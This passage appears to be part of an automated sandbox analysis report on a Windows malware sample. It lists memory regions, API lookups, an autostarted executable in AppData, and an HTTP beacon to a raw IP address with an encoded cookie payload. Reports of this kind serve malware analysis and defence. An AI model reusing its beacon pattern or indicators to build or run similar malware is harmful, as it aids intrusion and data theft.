- |
| private_0x0000000002790000 | 0x02790000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027a0000 | 0x027a0000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x02a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b90000 | 0x02b90000 | 0x02c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02e8ffff | Private Memory | rw |
|
|
|
- |
| winspool.drv | 0x74c40000 | 0x74c90fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ca0000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x74ce0000 | 0x74cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x75100000 | 0x75137fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x75140000 | 0x75145fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x75150000 | 0x751a9fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x75350000 | 0x75354fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x75360000 | 0x75367fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x75370000 | 0x753abfff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x753b0000 | 0x753c1fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x753d0000 | 0x753dffff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x753e0000 | 0x753e7fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x753f0000 | 0x753fdfff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x75400000 | 0x75451fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x75460000 | 0x75465fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x75470000 | 0x7547ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x75480000 | 0x75485fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x75490000 | 0x7549cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x754a0000 | 0x754b4fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x754c0000 | 0x754dbfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x754e0000 | 0x75523fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75530000 | 0x756cdfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x756d0000 | 0x7570afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75710000 | 0x75725fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75730000 | 0x75746fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x75750000 | 0x75756fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75760000 | 0x7576afff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x75950000 | 0x7595cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75a00000 | 0x75a02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
39 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 |
Module (39)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77e20000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x76a70000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77820000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x76330000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x75ac0000 |
|
1 | |
| Load | user32.dll | base_address = 0x77820000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exey.exe | base_address = 0x400000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77e42340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x76a84eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x77e624e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7784ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x77837809 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77837bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x77837bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x7783dafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x7783dad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x77837d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x77848455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x7783db98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x7783d22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x77840dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x77843559 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (375)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 246403 |
|
41 | |
| Get Time | type = Ticks, time = 246419 |
|
45 | |
| Get Time | type = Ticks, time = 246996 |
|
3 | |
| Get Time | type = Ticks, time = 248010 |
|
1 | |
| Get Time | type = Ticks, time = 249024 |
|
1 | |
| Get Time | type = Ticks, time = 250038 |
|
1 | |
| Get Time | type = Ticks, time = 251052 |
|
59 | |
| Get Time | type = Ticks, time = 251068 |
|
16 | |
| Get Time | type = Ticks, time = 251083 |
|
2 | |
| Get Time | type = Ticks, time = 252066 |
|
1 | |
| Get Time | type = Ticks, time = 253080 |
|
1 | |
| Get Time | type = Ticks, time = 254094 |
|
1 | |
| Get Time | type = Ticks, time = 255108 |
|
1 | |
| Get Time | type = Ticks, time = 256122 |
|
1 | |
| Get Time | type = Ticks, time = 257136 |
|
81 | |
| Get Time | type = Ticks, time = 257152 |
|
7 | |
| Get Time | type = Ticks, time = 260537 |
|
4 | |
| Get Time | type = Ticks, time = 260552 |
|
23 | |
| Get Time | type = Ticks, time = 260568 |
|
15 | |
| Get Time | type = Ticks, time = 260584 |
|
19 | |
| Get Time | type = Ticks, time = 260599 |
|
4 | |
| Get Time | type = Ticks, time = 260615 |
|
43 | |
| Get Time | type = Ticks, time = 260662 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 339 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 72.48.172.106 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 72.48.172.106 |
| Server Port | 80 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 72.48.172.106, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 64010=I8+hn5jbhXc6OS9ePi+y8naE0Q+xqTrrrJqjrOi09C6zE6ShiKYga5zxMrhxi4mSLdzcyOisLBmWBQHv4bE+psIT0XvYTwCVTjb/bvepWFXjwmc5PDxyX9PNG1S5v37gpxBibzmc70V9FDlUuu3Nnlkxr1Yj1kguAPhbHyj/NdYRrlfkcHGmfHFdtAWBzZ8xbOrLKIyTGwmzavRjAqaQLoyThy7P5gnEYlXyb3gaTv0sgchgivf45cEWt8+s5nz96wsioa5z+HoSaJ3l2/1kg05U+gDNHT+QeD/xADO1yuxR3ajuLGavW6nV4hXI/vrLb2AxfS+nDnKJWhhNl0pVsPIO5MT/45i6z4XEVHTfi62Tx/mMwISW6dJ89HL5ZRFhQcds4ktrZVaPSSr3npLR4NsrBlajsJo583potPxK/oXYRVp9M6e4X5Q+88tZO0xrQaWxjJWLPKJggNbZzCIfwXoW5rlN2Gh7mbKyDwE3OafftKlMF1ovaPXENCNVbh49Y843BK5aV3nREXiAU6iARgNIaIkmUIT0XcbOiY8i+R/W4REfTsf/vHzFSczdXI9Ud0RbUXZSEb43fpyCwH4lJ26lJXjP5my6jYTcJKVjC/0RFdhSiQyv5XKf4DiQUNgshutpXr9wx+v+hzalqg6klPQXxVppcscPJ53dN/pRW456zQcYJ8vWKqHlKpmAkdsDRy06mw==, url = 72.48.172.106 |
|
1 |
Process #15: cofiretlnt.exe
336
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:38, Reason: Autostart |
| Unmonitor | End Time: 00:04:47, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x530 |
| Parent PID | 0x45c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
534
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00247fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00268fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00298fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002b7fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00354fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cofiretlnt.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x02172fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x022dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x022e0000 | 0x025aefff | Memory Mapped File | r |
|
|
|
- |
| winspool.drv | 0x73550000 | 0x735a0fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x735b0000 | 0x735e1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x735f0000 | 0x73603fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73970000 | 0x73977fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73980000 | 0x739dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x739e0000 | 0x73a1efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74d90000 | 0x74d9bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74da0000 | 0x74dfffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74e00000 | 0x74e56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x74e60000 | 0x74eeffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74ef0000 | 0x74f4ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x74f60000 | 0x75054fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75070000 | 0x7520cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75260000 | 0x752fffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75300000 | 0x753abfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75500000 | 0x7550bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75510000 | 0x7561ffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75650000 | 0x75659fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75660000 | 0x7572bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75730000 | 0x75775fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75780000 | 0x758b5fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x759c0000 | 0x75adcfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75ae0000 | 0x75b7cfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c00000 | 0x75c11fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c20000 | 0x75c46fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75c50000 | 0x75c68fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75cb0000 | 0x75d3efff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75d40000 | 0x75f3afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f40000 | 0x7602ffff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76030000 | 0x7618bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076e40000 | 0x76e40000 | 0x76f5efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076f60000 | 0x76f60000 | 0x77059fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77060000 | 0x77208fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77240000 | 0x773bffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
40 |
Module (34)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77240000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x74e60000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x75510000 |
|
1 | |
| Load | USER32.dll | base_address = 0x758c0000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77262340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x74e74eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x755211f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7552110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75521809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x755214e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7726e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7553eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x755214c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75521700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75525929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x755c6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x772824e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x758eae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
